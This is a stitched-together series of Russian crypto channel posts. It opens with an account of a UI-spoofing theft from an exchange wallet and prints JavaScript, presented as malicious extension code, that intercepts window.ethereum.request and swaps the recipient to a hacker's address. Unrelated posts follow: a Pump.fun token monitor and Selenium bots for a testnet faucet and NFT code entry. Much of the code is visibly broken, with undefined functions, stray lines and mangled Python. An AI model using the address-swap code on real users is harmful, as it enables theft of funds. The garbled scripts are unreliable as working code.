использовась технику подмены интерфейса пользователя (UI spoofing), что позволило получить доступ к одному из холодных кошельков Ethereum биржи.

😎 Хакеры манипулировали процессом подписания транзакций, подменяя данные таким образом, что участники видели корректный адрес получателя, но фактически подтверждали измененную транзакцию.

Добавляется JavaScript-код на сайте или в расширении кошелька, который: ⬇️

> Перехватывает и изменяет отображаемые пользователю данные

> Меняет содержимое транзакции перед подписью

🎹 Подмена адреса получателя

Когда пользователь инициирует перевод, злоумышленник изменяет отображаемый адрес на подлинный (биржи), но перед подписанием транзакции он меняется на адрес хакера.

// Вредоносный код в расширении браузера или на фишинговом сайте
document.getElementById("recipient-address").value = "0xCorrectAddress";  // Подлинный адрес
document.getElementById("amount").value = "10"; 

// Перехват перед подписанием
window.ethereum.request = async (args) => {
if (args.method === "eth_sendTransaction") {
let tx = args.params[0];
console.log("Оригинальная транзакция:", tx);

    // Подмена адреса получателя на адрес хакера
    tx.to = "0xHackerAddress";

    console.log("Измененная транзакция:", tx);
    return originalEthereumRequest({ method: "eth_sendTransaction", params: [tx] });
}

return originalEthereumRequest(args);

};

tx.value = "0xde0b6b3a7640000"; // 1 ETH вместо 0.1 ETH

Что делать? 🔫

> нам, как юзерам не держать все на биржах, использовать базовую диверсификацию

ну и ☔️

> Включаем Google Authenticator 2FA и отключить SMS.

> Настроить белый список адресов для вывода.

> Проверить URL перед входом в аккаунт.

> Регулярно проверяйте активность аккаунта (IP)

pip install requests

import requests
import time

# URL для получения данных о новых токенах

API_URL = "https://pumpportal.fun/api/new-tokens"

# пороговые значения для фильтрации

MIN_MINTERS = 100       # Минимальное количество минтеров
MIN_LIQUIDITY = 10      # Минимальная ликвидность в SOL
MIN_PRICE = 0.001       # Минимальная цена в SOL
MAX_PRICE = 1           # Максимальная цена в SOL

# интервал проверки (в секундах)

CHECK_INTERVAL = 60

def fetch_new_tokens():
try:
response = requests.get(API_URL)
response.raise_for_status()
return response.json()
except requests.exceptions.RequestException as e:
print(f"Ошибка при получении данных: {e}")
return []

def filter_tokens(tokens):
filtered = []
for token in tokens:
minters = token.get('minters', 0)
liquidity = token.get('liquidity', 0)
price = token.get('price', 0)

    if (minters >= MIN_MINTERS and
        liquidity >= MIN_LIQUIDITY and
        MIN_PRICE <= price <= MAX_PRICE):
        filtered.append(token)
return filtered

def main():
print("Запуск мониторинга новых мемкоинов на Pump.fun...")
while True:
tokens = fetch_new_tokens()
if tokens:
filtered_tokens = filter_tokens(tokens)
for token in filtered_tokens:
notify(token)
else:
print("Нет новых токенов или ошибка при получении данных.")

    time.sleep(CHECK_INTERVAL)

if name == "main":
main()

😠 Далее можно добавлять:

> более точные критерии отбора токенов

> отслеживать ранних минтеров

> настроить лимиты на покупку

> И самое интересное проверять механизмы блокировки продаж в смарт-контракте + исключать токены с высоким налогом на продажу (sell tax).

L1 совместимый с EVM, разработан для решения проблем масштабируемости и эффективности

параллельное выполнение транзакций и оптимизированная база данных MonadDB, сеть способна обрабатывать до 10 000 транзакций в секунду при времени блока в 0,5 секунды и почти нулевых комиссиях за газ.

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
import time

WALLET_ADDRESS = "0xКошелек”

# настройка WebDriver

options = webdriver.ChromeOptions()
options.add_argument("--headless")  # Запуск без графического интерфейса

driver = webdriver.Chrome(options=options)

def request_tokens():
try:

Открываем страницу крана
driver.get("https://testnet.monad.xyz/")
time.sleep(3)  # Ждем загрузки

    # находим поле ввода и вводим адрес кошелька
    input_field = driver.find_element(By.XPATH, "//input[@type='text']")
    input_field.send_keys(WALLET_ADDRESS)
    time.sleep(1)

    # Нажимаем кнопку запроса токенов
    request_button = driver.find_element(By.XPATH, "//button[contains(text(), 'Request Testnet ETH')]")
    request_button.click()

    print("✅ Запрос тестовых токенов отправлен!")
except Exception as e:
    print("❌ Ошибка при запросе токенов:", e)
finally:
    driver.quit()

# запускаем
request_tokens()

Вводим код: 7AA0B | 2B2EB | C51B2 | C24B6 | C26D0

CODES = [
"7AA0B", "2B2EB", "C51B2", "C24B6", "C26D0"
]

options = webdriver.ChromeOptions()
options.add_argument("--headless") 

driver = webdriver.Chrome(options=options)

def mint_nft():
try:

driver.get("https://monad.talentum.id/projects")
time.sleep(3)  # ждем загрузки

    for code in CODES:
        try:
            print(f" Пробуем код: {code}")

            # находим поле ввода кода и вводим его
            input_field = driver.find_element(By.XPATH, "//input[@type='text']")
            input_field.clear()
            input_field.send_keys(code)
            time.sleep(1)

            # нажимаем кнопку подтверждения
            submit_button = driver.find_element(By.XPATH, "//button[contains(text(), 'Submit')]" )
            submit_button.click()
            time.sleep(5)  # ждем ответа

            # проверяем, появилась ли кнопка "Mint Rookie NFT"
            try:
                mint_button = driver.find_element(By.XPATH, "//button[contains(text(), 'Mint Rookie NFT')]")
                mint_button.click()
                print("✅ NFT успешно заминчен!")
                break  # Прекращаем цикл, если удалось заминтить
            except:
                print(f"❌ Код {code} не сработал, пробуем следующий...")
        except Exception as e:
            print(f"⚠ Ошибка с кодом {code}: {e}")
finally:
    driver.quit()
    print("🚀 Скрипт завершил работу.")

#Запуск

mint_nft()

Голопом по тестнетам...